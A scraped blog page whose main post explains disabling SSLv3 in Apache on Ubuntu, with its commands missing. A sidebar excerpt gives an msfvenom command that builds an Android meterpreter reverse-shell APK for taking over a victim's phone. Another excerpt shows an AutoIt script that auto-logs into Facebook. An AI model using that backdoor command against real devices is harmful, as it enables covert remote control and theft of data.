Skip to main content

How to disable SSLv3 in ubuntu?


Why disable SSL 3.0?

SSLv3 is not sufficiently secure. The replacement versions, in particular, Transport Layer Security(TLS) 1.2, are way more secure and capable protocols. 


  • Poodle attack and End of SSLv3 

In late September, a team at Google discovered a serious vulnerability(POODLE) in SSLv3 that can be exploited to steal confidential information, e.g things like cookies and passwords, enabling the latter to access a user's private account on a social website.
You can learn more about SSL on our Android app SSLearn.



Steps:

Firstly, let's start with an Update:



After the update, install apache:

Note: If you already have apache installed, you may skip this step.


After installing apache, type the following command to configure and disable SSLv3:

Then simply press the arrow down on your keyboard and search for SSLprotocol.
Add '-SSLv2 -SSLv3' at the end.

Then 3 lines upwards, you should be able to see #SSLHonorCipherOrderOn. You'll have to remove the '#' sign from it.

After you've the necessary modifications, hit Ctrl + O to save it.
Then hit Enter and save it under the same name.






How to check if SSLv3 is disabled?

To check if you've disabled SSL 3.0 successfully, you have to type the following command:

If you see Cipher's value 0000, then you have successfully disabled SSLv3,

You can even download our app SSLearn to learn more on SSL.

Comments

Popular posts from this blog

How to install the FReMP Stack on Ubuntu 20.04?

Technology keeps on evolving everyday and developers constantly look for more and more things to get their hands-on. In this article, I will be introducing a new full stack framework, called FReMP . The abbreviation used is not the best one, but it just gets the work done in justifiable ways. What on earth is FReMP stack? The FReMP stack is a highly scalable full stack framework, which can be used to build awesome web apps. The acronym stands for F lask, Re actJS, M ongodb and P ython. Unlike other famous stacks such as MEAN and MERN, the FReMP stack uses Python to handle back-end operations. Examples of such operations can be machine learning and artificial intelligence operations, web scraping tools or digital image processing. Step 0: Update your list of installed packages While this is optional, it is always a good practice to update your list of packages and upgrade them for newer versions before starting any installation on your environment. Run the following to do so: $ apt-get

[Android + msf]How to use Metasploit Framework on an Android Device?

Metasploit Framework(msf) Requirements: Linux-based OS You'll need to have msfconsole installed on your machine You'll need to have msfvenom correctly installed on the machine. This will be used to generate the backdoor.  Install apktool as well. Note: This tutorial is meant for educational purposes only. Please don't misguide the purpose of this tutorial, you'll be responsible for any act of Hacking or theft. Steps 1) First of all open up your terminal. (Ctrl + Alt + T) $ sudo apt-get update Update your repositories before starting. 2) Once updated, we can start. Simply follow the steps below to get started: $ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST='xxx.xxx.x.x' LPORT='xxxx' R > testfile.apk Replace "testfile" with any name you want. This will be the Main Activity, which when tapped on your android device will activate meterpreter on your terminal and let you gain full access to the victims android phone.

Learn how to make an auto login bot with Autoit

Start by creating a new directory and make an autoit script. Edit the script and include IE.au3: #include    Suppose we're writing a script which will allow a anyone to sign in his facebook on a scheduled time automatically. It's simple, don't panic! You need to call a function with any name you want. Let's take loginfb() ! call ("loginfb") So, we only have to write the function loginfb now! Func loginfb() Global $oIE = _IECreate ("https://www.facebook.com/") Local $username = _IEGetObjByName ($oIE, "email") Local $password = _IEgetObjByName ($oIE, "pass") Local $button = _IEGetObjById ($oIE, "loginbutton") _IEFormElementSetValue ($username, "") // your email here! _IEFormElementSetValue ($password, "") //your fb password here! Send("{Enter}") EndFunc $username and $password are variables. "email" and "pass" are the names given to the textarea